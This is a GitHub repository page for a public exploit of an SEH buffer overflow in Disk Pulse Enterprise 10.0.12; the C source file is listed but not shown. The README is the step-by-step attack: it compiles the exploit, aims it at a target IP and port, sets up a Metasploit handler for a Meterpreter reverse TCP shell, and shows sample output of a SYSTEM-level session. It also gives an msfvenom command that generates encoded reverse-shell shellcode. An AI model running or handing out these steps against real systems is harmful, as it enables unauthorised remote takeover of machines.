Skip to content

0x73unflower/Disk-Pulse-Enterprise-10.0.12-SEH-Overflow-Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
README.md
README.md
 
 
disk-pulse-enterprise-10.0.12.c
disk-pulse-enterprise-10.0.12.c
 
 

Repository files navigation

Disk Pulse Enterprise 10.0.12 SEH Overflow Exploit

Exploit

$ gcc disk-pulse-enterprise-10.0.12.c -o disk-pulse-enterprise-10.0.12
$ ./disk-pulse-enterprise-10.0.12
Disk Pulse Enterprise 10.0.12 SEH Exploit
Usage: IP PORT
$ ./disk-pulse-enterprise-10.0.12 "192.168.0.38" "80"
Connected to 192.168.0.38 on port 80!
Sending payload ... OK!
Bytes delivered ... 6298

Meterpreter

$ sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST <IP>; set LPORT <PORT>; set EXITFUNC seh; clear"
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.43:1337
[*] Sending stage (176198 bytes) to 192.168.0.38
[*] Meterpreter session 5 opened (192.168.0.43:1337 -> 192.168.0.38:50264) at 2024-09-17 12:30:21 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

A side note for a Meterpreter shell, ensure you generate custom shellcode and update the C source code file before compiling.

$ msfvenom -p windows/meterpreter/reverse_tcp LPORT=1337 -e x86/shikata_ga_nai -b '\x00\x02\x09\x0a\x0d\x20' -v shellcode -f c

Enjoy.

About

Disk Pulse Enterprise 10.0.12 SEH Overflow Exploit

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages